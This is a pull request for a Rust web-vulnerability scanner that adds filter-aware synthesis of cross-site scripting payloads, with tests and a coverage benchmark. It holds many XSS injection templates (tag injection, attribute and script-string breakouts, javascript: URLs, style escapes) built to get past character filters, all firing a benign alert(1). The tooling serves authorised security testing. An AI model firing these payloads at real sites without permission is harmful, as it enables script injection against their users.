### PR TITLE
feat(payload): filter-constrained generative payload synthesis (#1075)

### DIFF
--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -1,5 +1,6 @@
 pub mod mining;
 pub mod remote;
+pub mod synthesis;
 pub mod xss_blind;
 pub mod xss_csp_bypass;
 pub mod xss_dom_clobbering;

--- a/src/payload/synthesis.rs
+++ b/src/payload/synthesis.rs
@@ -1,0 +1,303 @@
+//! Filter-constrained generative payload synthesis (issue #1075).
+//!
+//! Stage 3 active probing records, per parameter, which of the
+//! [`crate::parameter_analysis::SPECIAL_PROBE_CHARS`] a server-side filter
+//! reflects unchanged (`valid_specials`) versus strips / encodes
+//! (`invalid_specials`), together with the [`InjectionContext`] the value lands
+//! in. The static payload catalogs ([`crate::payload::get_dynamic_xss_html_payloads`]
+//! et al.) can only express shapes written ahead of time, so a custom filter
+//! that allows an unusual subset of characters can slip past every catalog
+//! entry while still being exploitable with a *constructed* payload.
+//!
+//! This module turns that probed filter profile into payloads. It assembles a
+//! prioritised set of candidate shapes for the detected context, then keeps
+//! only the candidates whose every character survives the filter — so the
+//! "never emit a blocked character" guarantee falls out of construction rather
+//! than being re-checked downstream. Output is ordered by descending confidence
+//! (the scan loop is first-hit-wins, so the most likely shapes must come first)
+//! and carries the scan's DOM markers so a reflected synthesized payload can
+//! promote straight to a verified ([V]) finding.
+//!
+//! Synthesis is intentionally *small and high-signal*: it runs before the broad
+//! catalog and is capped at [`MAX_SYNTHESIZED`]. It augments, never replaces,
+//! the catalog — anything synthesis cannot express still gets the full catalog
+//! behind it.
+
+use crate::parameter_analysis::{DelimiterType, InjectionContext};
+
+/// Upper bound on synthesized payloads returned for a single (context, filter)
+/// pair. Synthesis is meant to be a compact set that runs *before* the full
+/// catalog, so this stays well under the catalog size.
+const MAX_SYNTHESIZED: usize = 48;
+
+/// JavaScript execution primitives, highest-preference first. Gating happens
+/// later via [`FilterProfile::allows_str`], so e.g. the backtick form survives a
+/// filter that strips `(` / `)` while the paren forms are dropped, and the
+/// `confirm`/`print` alternates survive a denylist on the literal `alert`.
+const JS_FUNCS: &[&str] = &["alert(1)", "alert`1`", "confirm(1)"];
+
+/// What a parameter's server-side filter permits.
+struct FilterProfile<'a> {
+    invalid: &'a [char],
+}
+
+impl<'a> FilterProfile<'a> {
+    fn new(invalid: &'a [char]) -> Self {
+        Self { invalid }
+    }
+
+    /// A character is usable unless active probing positively classified it as
+    /// filtered. Characters outside [`crate::parameter_analysis::SPECIAL_PROBE_CHARS`]
+    /// (letters, digits, space, `&`, `#`, …) are never probed and are always
+    /// assumed usable — markers and tag/handler names are alphanumeric and so
+    /// always pass.
+    #[inline]
+    fn allows(&self, c: char) -> bool {
+        !self.invalid.contains(&c)
+    }
+
+    /// True when every character of `s` is usable.
+    fn allows_str(&self, s: &str) -> bool {
+        s.chars().all(|c| self.allows(c))
+    }
+}
+
+// === Context-specific candidate templates, ordered by descending confidence ===
+//
+// Placeholders, substituted before the filter pass:
+//   {JS}    a JavaScript execution primitive from `JS_FUNCS`
+//   {CLASS} the scan's class DOM marker  (enables [V] via class selector)
+//   {ID}    the scan's id DOM marker     (enables [V] via id selector)
+//
+// These are plain `&str` constants (not `format!` templates), so `{{` is NOT an
+// escape: `${{JS}}` is the six literal characters `$ { { J S } }`, and
+// `replace("{JS}", "alert(1)")` rewrites the inner `{JS}` to yield the template
+// literal interpolation `${alert(1)}`.
+
+/// HTML text / element-content context: a tag must be injected, which needs
+/// `<` and `>`. When those are filtered every candidate here is dropped and the
+/// caller falls back to the catalog (or attribute-context synthesis for values
+/// that also echo into an attribute).
+const HTML_TEMPLATES: &[&str] = &[
+    "<svg onload={JS} class={CLASS}>",
+    "<img src=x onerror={JS} class={CLASS}>",
+    "<svg/onload={JS}/class={CLASS}>",
+    "<details open ontoggle={JS} class={CLASS}>",
+    "<svg onload={JS} id={ID}>",
+    "<img src=x onerror={JS} id={ID}>",
+    "<body onload={JS} class={CLASS}>",
+    "<marquee onstart={JS} class={CLASS}>",
+    "<video src=x onerror={JS} class={CLASS}>",
+    "<script class={CLASS}>{JS}</script>",
+    // Marker-less fallbacks ([R] only): useful when the marker attribute name
+    // itself is what the filter rejects but a bare tag still lands.
+    "<svg onload={JS}>",
+    "<img src=x onerror={JS}>",
+];
+
+/// Inside an HTML comment (`<!-- … -->`): close the comment, then inject a tag.
+const HTML_COMMENT_TEMPLATES: &[&str] = &[
+    "--><svg onload={JS} class={CLASS}>",
+    "--><img src=x onerror={JS} class={CLASS}>",
+    "--!><svg onload={JS} class={CLASS}>",
+    "--><svg/onload={JS}/class={CLASS}>",
+];
+
+/// Single-quoted attribute value. The "stay-in-tag" event-injection shapes need
+/// no `<`/`>`, so they survive angle-stripping filters; the breakout shapes
+/// follow for the common case where angles are allowed.
+const ATTR_SQ_TEMPLATES: &[&str] = &[
+    "' onmouseover={JS} class={CLASS} x='",
+    "' autofocus onfocus={JS} class={CLASS} x='",
+    "' ontoggle={JS} popover class={CLASS} x='",
+    "' onbeforeinput={JS} contenteditable class={CLASS} x='",
+    "' onmouseover={JS} id={ID} x='",
+    "'><svg onload={JS} class={CLASS}>",
+    "'><img src=x onerror={JS} class={CLASS}>",
+    "'><svg/onload={JS}/class={CLASS}>",
+    "'><svg onload={JS} id={ID}>",
+];
+
+/// Double-quoted attribute value (mirror of [`ATTR_SQ_TEMPLATES`]).
+const ATTR_DQ_TEMPLATES: &[&str] = &[
+    "\" onmouseover={JS} class={CLASS} x=\"",
+    "\" autofocus onfocus={JS} class={CLASS} x=\"",
+    "\" ontoggle={JS} popover class={CLASS} x=\"",
+    "\" onbeforeinput={JS} contenteditable class={CLASS} x=\"",
+    "\" onmouseover={JS} id={ID} x=\"",
+    "\"><svg onload={JS} class={CLASS}>",
+    "\"><img src=x onerror={JS} class={CLASS}>",
+    "\"><svg/onload={JS}/class={CLASS}>",
+    "\"><svg onload={JS} id={ID}>",
+];
+
+/// Unquoted attribute value: a space starts a new attribute on the same tag, or
+/// `>` closes the tag and a fresh tag follows.
+const ATTR_UNQUOTED_TEMPLATES: &[&str] = &[
+    "x onmouseover={JS} class={CLASS} ",
+    "x autofocus onfocus={JS} class={CLASS} ",
+    "x ontoggle={JS} popover class={CLASS} ",
+    "x onmouseover={JS} id={ID} ",
+    "><svg onload={JS} class={CLASS}>",
+    "><img src=x onerror={JS} class={CLASS}>",
+];
+
+/// URL-bearing attribute value (`href` / `src` / …): the protocol itself
+/// executes, no quote breakout required.
+const ATTR_URL_TEMPLATES: &[&str] = &["javascript:{JS}", "javascript:{JS}//"];
+
+/// Single-quoted JavaScript string literal.
+const JS_SQ_TEMPLATES: &[&str] = &[
+    "';{JS}//",
+    "'-{JS}-'",
+    "'+{JS}+'",
+    "');{JS}//",
+    "'}};{JS};'",
+    "</script><svg onload={JS} class={CLASS}>",
+];
+
+/// Double-quoted JavaScript string literal (mirror of [`JS_SQ_TEMPLATES`]).
+const JS_DQ_TEMPLATES: &[&str] = &[
+    "\";{JS}//",
+    "\"-{JS}-\"",
+    "\"+{JS}+\"",
+    "\");{JS}//",
+    "\"}};{JS};\"",
+    "</script><svg onload={JS} class={CLASS}>",
+];
+
+/// JavaScript template literal (backtick string): `${expr}` evaluates without
+/// escaping the surrounding backtick. `${{JS}}` → `${…}` (see header note).
+const JS_BACKTICK_TEMPLATES: &[&str] = &[
+    "${{JS}}",
+    "`;{JS}//",
+    "`-{JS}-`",
+    "</script><svg onload={JS} class={CLASS}>",
+];
+
+/// Inside a JavaScript block comment.
+const JS_COMMENT_TEMPLATES: &[&str] = &[
+    "*/{JS}/*",
+    "*/{JS}//",
+    "\n{JS}\n",
+    "</script><svg onload={JS} class={CLASS}>",
+];
+
+/// Raw JavaScript context (e.g. `var x = INJECT;`): no string to break out of.
+const JS_RAW_TEMPLATES: &[&str] = &[
+    "{JS}",
+    ";{JS};",
+    ";{JS}//",
+    "</script><svg onload={JS} class={CLASS}>",
+];
+
+/// CSS context with no string delimiter (`<style>…INJECT…</style>`).
+const CSS_PLAIN_TEMPLATES: &[&str] = &[
+    "</style><svg onload={JS} class={CLASS}>",
+    "</style><img src=x onerror={JS} class={CLASS}>",
+    "}</style><svg onload={JS} class={CLASS}>",
+];
+
+/// CSS context inside a single-quoted value.
+const CSS_SQ_TEMPLATES: &[&str] = &[
+    "');}</style><svg onload={JS} class={CLASS}>",
+    "</style><svg onload={JS} class={CLASS}>",
+];
+
+/// CSS context inside a double-quoted value.
+const CSS_DQ_TEMPLATES: &[&str] = &[
+    "\");}</style><svg onload={JS} class={CLASS}>",
+    "</style><svg onload={JS} class={CLASS}>",
+];
+
+/// Pick the candidate template set for `context`, ordered by descending
+/// confidence.
+fn templates_for(context: &InjectionContext) -> Vec<&'static str> {
+    match context {
+        InjectionContext::Html(Some(DelimiterType::Comment)) => HTML_COMMENT_TEMPLATES.to_vec(),
+        InjectionContext::Html(_) => HTML_TEMPLATES.to_vec(),
+        InjectionContext::Attribute(delim) | InjectionContext::AttributeUrl(delim) => {
+            let mut t: Vec<&'static str> = match delim {
+                Some(DelimiterType::SingleQuote) => ATTR_SQ_TEMPLATES.to_vec(),
+                Some(DelimiterType::DoubleQuote) => ATTR_DQ_TEMPLATES.to_vec(),
+                // Backtick / Comment delimiters aren't meaningful for HTML
+                // attribute values; treat them as unquoted.
+                _ => ATTR_UNQUOTED_TEMPLATES.to_vec(),
+            };
+            if matches!(context, InjectionContext::AttributeUrl(_)) {
+                t.extend_from_slice(ATTR_URL_TEMPLATES);
+            }
+            t
+        }
+        InjectionContext::Javascript(delim) => match delim {
+            Some(DelimiterType::SingleQuote) => JS_SQ_TEMPLATES.to_vec(),
+            Some(DelimiterType::DoubleQuote) => JS_DQ_TEMPLATES.to_vec(),
+            Some(DelimiterType::Backtick) => JS_BACKTICK_TEMPLATES.to_vec(),
+            Some(DelimiterType::Comment) => JS_COMMENT_TEMPLATES.to_vec(),
+            None => JS_RAW_TEMPLATES.to_vec(),
+        },
+        InjectionContext::Css(delim) => match delim {
+            Some(DelimiterType::SingleQuote) => CSS_SQ_TEMPLATES.to_vec(),
+            Some(DelimiterType::DoubleQuote) => CSS_DQ_TEMPLATES.to_vec(),
+            _ => CSS_PLAIN_TEMPLATES.to_vec(),
+        },
+    }
+}
+
+/// Construct filter-constrained payloads for `context` given the characters the
+/// parameter's filter blocks (`invalid_specials`) and allows (`valid_specials`).
+///
+/// Returns a deduplicated, confidence-ordered list (most likely first), capped
+/// at [`MAX_SYNTHESIZED`]. Every returned payload is guaranteed to use only
+/// characters not present in `invalid_specials`. May return an empty vec when no
+/// candidate shape survives the filter (e.g. an HTML-text reflection with `<`
+/// stripped) — callers fall back to the catalog.
+///
+/// Payloads use the default `alert(1)` / `` alert`1` `` execution primitives;
+/// `--custom-alert-value` substitution is not applied (consistent with the
+/// existing adaptive-payload path, and immaterial to detection since promotion
+/// to [V] is marker-based, not alert-value based).
+pub fn synthesize_payloads(
+    context: &InjectionContext,
+    invalid_specials: &[char],
+    valid_specials: &[char],
+) -> Vec<String> {
+    // `valid_specials` is accepted for symmetry with `generate_adaptive_payloads`
+    // and forward use (e.g. confidence weighting); gating is expressed purely as
+    // "not known-blocked" so that non-probed characters stay usable.
+    let _ = valid_specials;
+
+    let profile = FilterProfile::new(invalid_specials);
+    let class = crate::scanning::markers::class_marker();
+    let id = crate::scanning::markers::id_marker();
+
+    let mut out: Vec<String> = Vec::new();
+    let mut seen: std::collections::HashSet<String> = std::collections::HashSet::new();
+
+    'outer: for template in templates_for(context) {
+        for func in JS_FUNCS {
+            let payload = template
+                .replace("{JS}", func)
+                .replace("{CLASS}", class)
+                .replace("{ID}", id);
+
+            // Filter-constraint guarantee: never emit a payload that uses a
+            // character the server's filter strips. This single check is what
+            // makes the output "constrained" — construction above is optimistic.
+            // (A template carrying no `{JS}` would produce the same string for
+            // every `func`; `seen` collapses those duplicates, so no special
+            // casing is needed.)
+            if profile.allows_str(&payload) && seen.insert(payload.clone()) {
+                out.push(payload);
+                if out.len() >= MAX_SYNTHESIZED {
+                    break 'outer;
+                }
+            }
+        }
+    }
+
+    out
+}
+
+#[cfg(test)]
+mod tests;

--- a/src/payload/synthesis/tests.rs
+++ b/src/payload/synthesis/tests.rs
@@ -1,0 +1,508 @@
+use super::*;
+use crate::parameter_analysis::{DelimiterType, InjectionContext};
+
+/// Every probed special character, used to assert the filter-constraint
+/// invariant exhaustively.
+const ALL_SPECIALS: &[char] = crate::parameter_analysis::SPECIAL_PROBE_CHARS;
+
+/// Core invariant: a synthesized payload must never contain a character the
+/// filter is known to strip.
+fn assert_obeys_filter(payloads: &[String], invalid: &[char]) {
+    for p in payloads {
+        for c in p.chars() {
+            assert!(
+                !invalid.contains(&c),
+                "synthesized payload {:?} uses blocked char {:?} (invalid={:?})",
+                p,
+                c,
+                invalid
+            );
+        }
+    }
+}
+
+fn html() -> InjectionContext {
+    InjectionContext::Html(None)
+}
+
+#[test]
+fn produces_payloads_for_every_context_when_unfiltered() {
+    let contexts = [
+        InjectionContext::Html(None),
+        InjectionContext::Html(Some(DelimiterType::Comment)),
+        InjectionContext::Attribute(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Attribute(None),
+        InjectionContext::AttributeUrl(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::Backtick)),
+        InjectionContext::Javascript(Some(DelimiterType::Comment)),
+        InjectionContext::Javascript(None),
+        InjectionContext::Css(None),
+        InjectionContext::Css(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Css(Some(DelimiterType::DoubleQuote)),
+    ];
+    for ctx in contexts {
+        let payloads = synthesize_payloads(&ctx, &[], &[]);
+        assert!(
+            !payloads.is_empty(),
+            "expected synthesized payloads for {:?}",
+            ctx
+        );
+    }
+}
+
+#[test]
+fn output_is_capped_and_deduped() {
+    // Exercise every context; none may exceed the cap or contain duplicates.
+    for ctx in [
+        InjectionContext::Html(None),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+    ] {
+        let payloads = synthesize_payloads(&ctx, &[], &[]);
+        assert!(
+            payloads.len() <= MAX_SYNTHESIZED,
+            "cap exceeded for {:?}",
+            ctx
+        );
+        let mut sorted = payloads.clone();
+        sorted.sort();
+        sorted.dedup();
+        assert_eq!(sorted.len(), payloads.len(), "duplicates for {:?}", ctx);
+    }
+}
+
+#[test]
+fn obeys_filter_for_assorted_blocked_sets() {
+    let blocked_sets: &[&[char]] = &[
+        &['<', '>'],
+        &['('],
+        &['(', ')'],
+        &['"'],
+        &['\''],
+        &['<', '>', '(', ')'],
+        &[';', '/'],
+        &['=', '<', '>'],
+        ALL_SPECIALS, // everything blocked
+    ];
+    let contexts = [
+        InjectionContext::Html(None),
+        InjectionContext::Html(Some(DelimiterType::Comment)),
+        InjectionContext::Attribute(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Attribute(None),
+        InjectionContext::AttributeUrl(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::Backtick)),
+        InjectionContext::Javascript(None),
+        InjectionContext::Css(None),
+    ];
+    for invalid in blocked_sets {
+        for ctx in &contexts {
+            let payloads = synthesize_payloads(ctx, invalid, &[]);
+            assert_obeys_filter(&payloads, invalid);
+        }
+    }
+}
+
+#[test]
+fn everything_blocked_yields_nothing() {
+    // With every special character stripped there is no way to construct an
+    // executing payload, so synthesis must bow out (and let the caller fall
+    // back) rather than emit junk.
+    for ctx in [
+        html(),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+    ] {
+        let payloads = synthesize_payloads(&ctx, ALL_SPECIALS, &[]);
+        assert!(payloads.is_empty(), "expected empty for {:?}", ctx);
+    }
+}
+
+#[test]
+fn html_text_context_needs_angles() {
+    // HTML element-content reflection can only execute by injecting a tag, so a
+    // filter that strips `<` defeats synthesis here.
+    let payloads = synthesize_payloads(&html(), &['<'], &[]);
+    assert!(
+        payloads.is_empty(),
+        "HTML text context should yield nothing when `<` is stripped, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn attribute_context_survives_angle_stripping() {
+    // The key win: a quoted-attribute reflection stays exploitable without
+    // `<`/`>` via stay-in-tag event injection.
+    let ctx = InjectionContext::Attribute(Some(DelimiterType::DoubleQuote));
+    let payloads = synthesize_payloads(&ctx, &['<', '>'], &[]);
+    assert!(
+        !payloads.is_empty(),
+        "attribute context should still synthesize angle-free payloads"
+    );
+    for p in &payloads {
+        assert!(
+            !p.contains('<') && !p.contains('>'),
+            "angle leaked in {:?}",
+            p
+        );
+    }
+    // At least one must be a real event-handler injection that can fire.
+    assert!(
+        payloads
+            .iter()
+            .any(|p| p.contains("onmouseover=") || p.contains("onfocus=")),
+        "expected an event-handler injection, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn paren_blocked_falls_back_to_backtick_call() {
+    // With `(`/`)` stripped, the only surviving execution primitive is the
+    // tagged-template call `alert`1``.
+    let ctx = InjectionContext::Attribute(Some(DelimiterType::DoubleQuote));
+    let payloads = synthesize_payloads(&ctx, &['(', ')'], &[]);
+    assert!(!payloads.is_empty());
+    assert_obeys_filter(&payloads, &['(', ')']);
+    assert!(
+        payloads.iter().any(|p| p.contains("alert`1`")),
+        "expected a backtick call form, got {:?}",
+        payloads
+    );
+    assert!(
+        payloads.iter().all(|p| !p.contains("alert(1)")),
+        "paren call should have been filtered out"
+    );
+}
+
+#[test]
+fn single_quote_attr_needs_the_quote() {
+    // Breaking out of a single-quoted value requires emitting `'`; if that is
+    // stripped, synthesis bows out (escaped-quote handling is tracked
+    // separately).
+    let ctx = InjectionContext::Attribute(Some(DelimiterType::SingleQuote));
+    let payloads = synthesize_payloads(&ctx, &['\''], &[]);
+    assert!(
+        payloads.is_empty(),
+        "single-quote attribute with `'` stripped should yield nothing, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn backtick_js_context_uses_template_interpolation() {
+    let ctx = InjectionContext::Javascript(Some(DelimiterType::Backtick));
+    let payloads = synthesize_payloads(&ctx, &[], &[]);
+    assert!(
+        payloads.iter().any(|p| p.contains("${alert(1)}")),
+        "expected `${{alert(1)}}` interpolation, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn js_string_context_survives_angle_stripping() {
+    // A reflection inside a JS string can break out with quotes alone — no
+    // `</script>` tag needed — so angle stripping does not defeat it.
+    let ctx = InjectionContext::Javascript(Some(DelimiterType::SingleQuote));
+    let payloads = synthesize_payloads(&ctx, &['<', '>'], &[]);
+    assert!(!payloads.is_empty());
+    assert!(
+        payloads.iter().any(|p| p.starts_with('\'')),
+        "expected a quote-breakout JS payload, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn high_confidence_payloads_carry_a_marker() {
+    // The lead payloads for marker-friendly contexts must embed a DOM marker so
+    // a reflection can promote straight to [V].
+    let class = crate::scanning::markers::class_marker();
+    let id = crate::scanning::markers::id_marker();
+    for ctx in [
+        html(),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Css(None),
+    ] {
+        let payloads = synthesize_payloads(&ctx, &[], &[]);
+        assert!(
+            payloads
+                .iter()
+                .take(3)
+                .any(|p| p.contains(class) || p.contains(id)),
+            "expected a marker in the lead payloads for {:?}: {:?}",
+            ctx,
+            &payloads[..payloads.len().min(3)]
+        );
+    }
+}
+
+#[test]
+fn html_lead_payload_is_the_most_reliable_shape() {
+    // Confidence ordering: the first HTML candidate should be the auto-firing
+    // svg/onload tag.
+    let payloads = synthesize_payloads(&html(), &[], &[]);
+    assert!(
+        payloads[0].starts_with("<svg onload=alert(1)"),
+        "unexpected lead payload: {:?}",
+        payloads[0]
+    );
+}
+
+#[test]
+fn attribute_url_context_includes_protocol_payload() {
+    let ctx = InjectionContext::AttributeUrl(Some(DelimiterType::DoubleQuote));
+    let payloads = synthesize_payloads(&ctx, &[], &[]);
+    assert!(
+        payloads.iter().any(|p| p.contains("javascript:alert(1)")),
+        "expected a javascript: protocol payload, got {:?}",
+        payloads
+    );
+}
+
+#[test]
+fn empty_profile_matches_no_filtering() {
+    // No probe data → nothing is "blocked" → full-strength synthesis.
+    let payloads = synthesize_payloads(&html(), &[], &[]);
+    assert!(payloads.len() > 5);
+}
+
+// ===================================================================
+// Effectiveness benchmark (deterministic): does synthesis add executable,
+// verifiable payloads the static catalog cannot express for a given filter?
+//
+// For each (context, blocked-chars) scenario we count, over a payload set, those
+// that (a) survive the filter unchanged and (b) carry an executing construct —
+// and, separately, those that additionally carry a DOM marker (so they can
+// promote to a *verified* [V] finding). The SAME structural oracle is applied to
+// catalog and synthesis, so the comparison is fair. The counts are upper bounds
+// on real executability and are used only for relative comparison.
+//
+// We deliberately do NOT assert "catalog ∪ synth ≥ catalog": a superset can
+// never cover less, so that would be vacuous. The falsifiable claims this test
+// makes are (1) synthesis closes complete gaps — scenarios where the catalog
+// yields zero verifiable payloads and synthesis yields some — and (2) synthesis
+// contributes verifiable payloads that are NOT already in the catalog (net-new
+// coverage). Either assertion can fail if synthesis is ineffective.
+// ===================================================================
+
+/// True when `payload` uses no character the filter strips (survives intact).
+fn survives(payload: &str, blocked: &[char]) -> bool {
+    payload.chars().all(|c| !blocked.contains(&c))
+}
+
+/// True when `payload` carries a construct that executes script.
+fn executes(payload: &str) -> bool {
+    let p = payload.to_ascii_lowercase();
+    // A direct JS call (covers reflections inside an existing script where no
+    // tag/handler is needed, e.g. `';alert(1)//`).
+    let js_call = [
+        "alert(", "confirm(", "prompt(", "alert`", "confirm`", "prompt`", "eval(",
+    ]
+    .iter()
+    .any(|needle| p.contains(needle));
+    // event handler `on<name>=`, an injected <script>, a javascript: URL, or a
+    // template-literal interpolation.
+    js_call || p.contains("<script") || p.contains("javascript:") || p.contains("${") || {
+        // crude `on<letters>=` detector without pulling in regex here
+        let bytes = p.as_bytes();
+        let mut i = 0;
+        let mut found = false;
+        while i + 2 < bytes.len() {
+            if &bytes[i..i + 2] == b"on" {
+                let mut j = i + 2;
+                while j < bytes.len() && bytes[j].is_ascii_lowercase() {
+                    j += 1;
+                }
+                if j > i + 2 && j < bytes.len() && bytes[j] == b'=' {
+                    found = true;
+                    break;
+                }
+            }
+            i += 1;
+        }
+        found
+    }
+}
+
+fn has_marker(payload: &str, class: &str, id: &str) -> bool {
+    payload.contains(class) || payload.contains(id)
+}
+
+#[derive(Default, Clone, Copy)]
+struct Coverage {
+    exec: usize,
+    verifiable: usize,
+}
+
+fn coverage(payloads: &[String], blocked: &[char], class: &str, id: &str) -> Coverage {
+    let mut c = Coverage::default();
+    for p in payloads {
+        if survives(p, blocked) && executes(p) {
+            c.exec += 1;
+            if has_marker(p, class, id) {
+                c.verifiable += 1;
+            }
+        }
+    }
+    c
+}
+
+#[test]
+fn synthesis_closes_catalog_coverage_gaps() {
+    let class = crate::scanning::markers::class_marker();
+    let id = crate::scanning::markers::id_marker();
+
+    // (label, context, characters the server-side filter strips)
+    let scenarios: &[(&str, InjectionContext, &[char])] = &[
+        (
+            "attr(\") + strip <>",
+            InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+            &['<', '>'],
+        ),
+        (
+            "attr(\") + strip ()",
+            InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+            &['(', ')'],
+        ),
+        (
+            "attr(\") + strip <> ()",
+            InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+            &['<', '>', '(', ')'],
+        ),
+        (
+            "attr(') + strip <> ()",
+            InjectionContext::Attribute(Some(DelimiterType::SingleQuote)),
+            &['<', '>', '(', ')'],
+        ),
+        (
+            "html + strip \"'",
+            InjectionContext::Html(None),
+            &['"', '\''],
+        ),
+        ("html + strip ()", InjectionContext::Html(None), &['(', ')']),
+        (
+            "js(') + strip <>",
+            InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+            &['<', '>'],
+        ),
+        (
+            "attrUrl(\") + strip <>",
+            InjectionContext::AttributeUrl(Some(DelimiterType::DoubleQuote)),
+            &['<', '>'],
+        ),
+    ];
+
+    let mut total_catalog_verif = 0usize;
+    let mut total_netnew_verif = 0usize;
+    let mut gaps_closed = 0usize;
+
+    println!(
+        "\n{:<26} | catalog(exec/verif) | synth(exec/verif) | net-new verif",
+        "scenario"
+    );
+    println!("{}", "-".repeat(82));
+
+    for (label, ctx, blocked) in scenarios {
+        // Dedup the catalog so duplicates don't inflate its coverage.
+        let mut catalog = crate::scanning::xss_common::generate_dynamic_payloads(ctx);
+        catalog.sort();
+        catalog.dedup();
+        let synth = synthesize_payloads(ctx, blocked, &[]);
+
+        // Net-new = synthesized payloads the catalog does not already contain.
+        // This is the coverage synthesis genuinely *adds*, not an artifact of
+        // concatenation — counting it on the set difference makes the headline
+        // assertion falsifiable (it is 0 if synthesis only echoes the catalog).
+        let catalog_set: std::collections::HashSet<&String> = catalog.iter().collect();
+        let synth_only: Vec<String> = synth
+            .iter()
+            .filter(|p| !catalog_set.contains(*p))
+            .cloned()
+            .collect();
+
+        let cat = coverage(&catalog, blocked, class, id);
+        let syn = coverage(&synth, blocked, class, id);
+        let netnew = coverage(&synth_only, blocked, class, id);
+
+        println!(
+            "{:<26} | {:>6}/{:<6}      | {:>5}/{:<5}     | {}",
+            label, cat.exec, cat.verifiable, syn.exec, syn.verifiable, netnew.verifiable
+        );
+
+        total_catalog_verif += cat.verifiable;
+        total_netnew_verif += netnew.verifiable;
+        if cat.verifiable == 0 && syn.verifiable > 0 {
+            gaps_closed += 1;
+        }
+    }
+
+    println!("{}", "-".repeat(82));
+    println!(
+        "verifiable payloads — catalog total: {}, net-new from synthesis: {}, complete gaps closed: {}",
+        total_catalog_verif, total_netnew_verif, gaps_closed
+    );
+
+    // (1) Synthesis must produce verifiable payloads in at least one scenario
+    //     where the catalog produces none — a gap the catalog cannot express.
+    assert!(
+        gaps_closed > 0,
+        "synthesis closed no catalog coverage gaps — expected at least one"
+    );
+    // (2) Synthesis must contribute verifiable payloads absent from the catalog
+    //     (net-new coverage), aggregated across scenarios.
+    assert!(
+        total_netnew_verif > 0,
+        "synthesis added no verifiable payloads beyond the catalog"
+    );
+}
+
+#[test]
+fn synthesis_is_fast_and_bounded() {
+    // Performance guard: synthesis runs once per parameter inside the scan loop,
+    // so it must be cheap. 20k calls across a mix of contexts/filters should be
+    // far under a second even in debug; we assert a generous ceiling to stay
+    // non-flaky in CI while still catching pathological regressions.
+    let contexts = [
+        InjectionContext::Html(None),
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+        InjectionContext::AttributeUrl(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Css(None),
+    ];
+    let blocked_sets: &[&[char]] = &[&[], &['<', '>'], &['(', ')'], &['<', '>', '(', ')']];
+
+    let start = std::time::Instant::now();
+    let mut produced = 0usize;
+    let iterations = 1_000;
+    for _ in 0..iterations {
+        for ctx in &contexts {
+            for blocked in blocked_sets {
+                let out = synthesize_payloads(ctx, blocked, &[]);
+                assert!(out.len() <= MAX_SYNTHESIZED);
+                produced += out.len();
+            }
+        }
+    }
+    let elapsed = start.elapsed();
+    let calls = iterations * contexts.len() * blocked_sets.len();
+    println!(
+        "synthesis perf: {} calls, {} payloads, {:?} ({:.1} ns/call)",
+        calls,
+        produced,
+        elapsed,
+        elapsed.as_nanos() as f64 / calls as f64
+    );
+    assert!(
+        elapsed.as_secs() < 5,
+        "synthesis unexpectedly slow: {:?} for {} calls",
+        elapsed,
+        calls
+    );
+}

--- a/src/scanning/mod.rs
+++ b/src/scanning/mod.rs
@@ -869,6 +869,42 @@ fn generate_param_jobs(
         };
         let mut dom_payloads = get_dom_payloads(param, args).unwrap_or_else(|_| vec![]);
 
+        // Issue #1075: prepend filter-constrained synthesized payloads to the
+        // reflection set when active probing produced a character profile for
+        // this parameter. (Non-JS DOM payloads receive synthesis separately
+        // inside `get_dom_payloads` → `generate_adaptive_payloads`; JS-context
+        // DOM payloads use the dedicated script-breakout set instead.) Placing
+        // them first lets the first-hit-wins reflection loop try shapes built
+        // for this exact filter before the broad catalog, lifting detection on
+        // custom filters; under non-`--deep-scan` runs that ordering can also
+        // cut requests by hitting earlier.
+        //
+        // Note: with an explicit small `--max-payloads-per-param` (< the synth
+        // count), the truncation below can evict the catalog entirely in favour
+        // of these higher-signal synthesized payloads — intentional, since the
+        // user asked for few payloads and these are the ones most likely to fire.
+        if let Some(context) = &param.injection_context
+            && (param.invalid_specials.is_some() || param.valid_specials.is_some())
+        {
+            let invalid = param.invalid_specials.as_deref().unwrap_or_default();
+            let valid = param.valid_specials.as_deref().unwrap_or_default();
+            let synthesized =
+                crate::payload::synthesis::synthesize_payloads(context, invalid, valid);
+            if !synthesized.is_empty() {
+                let mut seen: std::collections::HashSet<String> =
+                    std::collections::HashSet::with_capacity(
+                        synthesized.len() + reflection_payloads.len(),
+                    );
+                let mut merged = Vec::with_capacity(synthesized.len() + reflection_payloads.len());
+                for p in synthesized.into_iter().chain(reflection_payloads) {
+                    if seen.insert(p.clone()) {
+                        merged.push(p);
+                    }
+                }
+                reflection_payloads = merged;
+            }
+        }
+
         // Append shared payloads (CSP bypass + tech-specific)
         reflection_payloads.extend(shared_payloads.iter().cloned());
         dom_payloads.extend(shared_payloads.iter().cloned());

